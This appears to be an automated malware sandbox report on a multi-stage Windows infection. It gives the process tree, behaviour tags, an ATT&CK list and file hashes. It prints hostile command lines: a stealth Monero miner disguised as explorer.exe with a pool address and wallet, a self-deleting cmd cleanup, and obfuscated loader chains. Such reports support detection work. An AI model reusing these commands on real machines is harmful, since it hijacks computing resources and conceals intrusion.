C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\5857001.exe"C:\ProgramData\5857001.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3640 -s 21129⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\ProgramData\7915113.exe"C:\ProgramData\7915113.exe"8⤵
-
C:\ProgramData\6304085.exe"C:\ProgramData\6304085.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\6304085.exe"C:\ProgramData\6304085.exe"9⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 10769⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5444 -s 17168⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 6128⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-0OS4E.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-0OS4E.tmp\setup_2.tmp" /SL5="$301A4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue182b14dec1cfd6f.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue182b14dec1cfd6f.exeTue182b14dec1cfd6f.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 2406⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue18773fa7cbf.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue18773fa7cbf.exeTue18773fa7cbf.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 17926⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1868667ab9f56c.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue1868667ab9f56c.exeTue1868667ab9f56c.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue18947abfdb94ab025.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue18947abfdb94ab025.exeTue18947abfdb94ab025.exe5⤵
- Executes dropped EXE
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 1PsfHjy/6UuX87LF/E3WAg.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1196 -ip 11961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1212 -ip 12121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1324 -ip 13241⤵
-
C:\Users\Admin\AppData\Local\Temp\is-Q8TBA.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q8TBA.tmp\setup_2.tmp" /SL5="$E01F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-PSS3G.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-PSS3G.tmp\postback.exe" ss13⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 500 -p 5444 -ip 54441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4612 -ip 46121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 5580 -ip 55801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5516 -s 4562⤵
- Program crash
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5516 -ip 55161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5040 -ip 50401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 4603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3980 -ip 39801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 628 -p 5188 -ip 51881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 644 -p 3640 -ip 36401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 1308 -ip 13081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 35D881A2AD6519FD5C78C3E3435349D4 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 81F9D09B6DA0721AA57C91FA086B399A2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1F9035AEC0BCF3B140B3FA3493CCE704 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1992 -ip 19921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 1576 -ip 15761⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c cmd < Sai.tmp1⤵
-
C:\Windows\SysWOW64\cmd.execmd2⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^SSpBUHXGKUiBGIGMjTOcaYjEyMbzyuBEujmkDFBqdKBfyUsPCLGVjFXTFEvopDAEaCxzpxoHaNyHvXnlxIRzmFaBfFGYpaQNlXWCm$" Subitanea.tmp3⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comLevandosi.exe.com K3⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K4⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K5⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K6⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K7⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K8⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K9⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K10⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K11⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K12⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K13⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K14⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K15⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K16⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K17⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K18⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K19⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K20⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K21⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K22⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K23⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K24⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K25⤵
-
C:\Users\Admin\AppData\Roaming\Levandosi.exe.comC:\Users\Admin\AppData\Roaming\Levandosi.exe.com K26⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 2068 -ip 20681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 5372 -ip 53721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 4608 -ip 46081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 5516 -ip 55161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 4603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1352 -ip 13521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 5056 -ip 50561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 3136 -ip 31361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 696 -ip 6961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 6096 -ip 60961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 2252 -ip 22521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 5660 -ip 56601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5056 -ip 50561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5204 -ip 52041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 5056 -ip 50561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 1992 -ip 19921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5056 -ip 50561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 5288 -ip 52881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 5056 -ip 50561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1992 -ip 19921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5056 -ip 50561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 1992 -ip 19921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1992 -ip 19921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1992 -ip 19921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:51⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 7552 -ip 75521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 7956 -ip 79561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 5056 -ip 50561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5056 -ip 50561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5056 -ip 50561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\890D.exeC:\Users\Admin\AppData\Local\Temp\890D.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\890D.exeC:\Users\Admin\AppData\Local\Temp\890D.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\9524.exeC:\Users\Admin\AppData\Local\Temp\9524.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\9524.exeC:\Users\Admin\AppData\Local\Temp\9524.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\A409.exeC:\Users\Admin\AppData\Local\Temp\A409.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 3002⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5836 -ip 58361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\B281.exeC:\Users\Admin\AppData\Local\Temp\B281.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Users\Admin\AppData\Local\Temp\BFC1.exeC:\Users\Admin\AppData\Local\Temp\BFC1.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\D108.exeC:\Users\Admin\AppData\Local\Temp\D108.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 2562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\E617.exeC:\Users\Admin\AppData\Local\Temp\E617.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\asgNAbNT & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\E617.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 43⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 6568 -ip 65681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\EE94.exeC:\Users\Admin\AppData\Local\Temp\EE94.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 2842⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\FD3B.exeC:\Users\Admin\AppData\Local\Temp\FD3B.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 2762⤵
- Program crash
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3428 -ip 34281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\1940.exeC:\Users\Admin\AppData\Local\Temp\1940.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2196 -ip 21961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\2567.exeC:\Users\Admin\AppData\Local\Temp\2567.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 3082⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 828 -p 1696 -ip 16961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\FAC1.exeC:\Users\Admin\AppData\Local\Temp\FAC1.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 2802⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1224 -ip 12241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
4Disabling Security Tools
1Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2.exeMD5
d4e24aca0a26e61a5e078cb698b126ab
SHA1fc9609631cf3d6bacee06fe7495e08be47c16e37
SHA256ed6a50f119b3fb258f3dad2babb1ee3660c11e0113a66683672a660bd81640e1
SHA5121f0e88d9c4c3d66c4ff427832518eddee9ef82a1ea536a256ef9f2892b423a1d543f24d271cf85fb6afe2eebaa1658ea07bdb86723f4ce3cb2cdc9b016b70d9c
-
C:\Users\Admin\AppData\Local\Temp\2.exeMD5
d4e24aca0a26e61a5e078cb698b126ab
SHA1fc9609631cf3d6bacee06fe7495e08be47c16e37
SHA256ed6a50f119b3fb258f3dad2babb1ee3660c11e0113a66683672a660bd81640e1
SHA5121f0e88d9c4c3d66c4ff427832518eddee9ef82a1ea536a256ef9f2892b423a1d543f24d271cf85fb6afe2eebaa1658ea07bdb86723f4ce3cb2cdc9b016b70d9c
-
C:\Users\Admin\AppData\Local\Temp\3002.exeMD5
e511bb4cf31a2307b6f3445a869bcf31
SHA176f5c6e8df733ac13d205d426831ed7672a05349
SHA25656002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137
SHA5129c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c
-
C:\Users\Admin\AppData\Local\Temp\4.exeMD5
0993d3dbee7f5db656deb1d3b80b838f
SHA1334097f601d44f3691b64f6b58199f06abae52ff
SHA25652d1d5a74aacb3b3b98c01cbc23567cfc9264d972600a48e89dd6b0616e0aa4c
SHA512575be90cf66e55e059c97fb5ca6f02106e5720c9dd97ec6cbc96cd0dfb4a75ccb5975132735c89917813bad2c728e375e79586ded65aa20e61c6fe9a830a78cc
-
C:\Users\Admin\AppData\Local\Temp\4.exeMD5
0993d3dbee7f5db656deb1d3b80b838f
SHA1334097f601d44f3691b64f6b58199f06abae52ff
SHA25652d1d5a74aacb3b3b98c01cbc23567cfc9264d972600a48e89dd6b0616e0aa4c
SHA512575be90cf66e55e059c97fb5ca6f02106e5720c9dd97ec6cbc96cd0dfb4a75ccb5975132735c89917813bad2c728e375e79586ded65aa20e61c6fe9a830a78cc
-
C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue1807ec103e6254c2f.exeMD5
3a9115aa34ddc3302fe3d07ceddd4373
SHA110e7f2a8c421c825a2467d488b33de09c2c2a14b
SHA256080060800d33d4fa01099647797195995af436cbad0a5dc903a572b184b50634
SHA51285fa6eddbaec2df843d623ddf88154cd2b62b9823c953b5659dc0464e1a47b90a877ca3681007561d2e1ccdd315e4f79ecf0285404868cc7cedd369ae28a586a
-
C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue1807ec103e6254c2f.exeMD5
3a9115aa34ddc3302fe3d07ceddd4373
SHA110e7f2a8c421c825a2467d488b33de09c2c2a14b
SHA256080060800d33d4fa01099647797195995af436cbad0a5dc903a572b184b50634
SHA51285fa6eddbaec2df843d623ddf88154cd2b62b9823c953b5659dc0464e1a47b90a877ca3681007561d2e1ccdd315e4f79ecf0285404868cc7cedd369ae28a586a
-
C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue182b14dec1cfd6f.exeMD5
55513c3341e2c0c54429341d559622b5
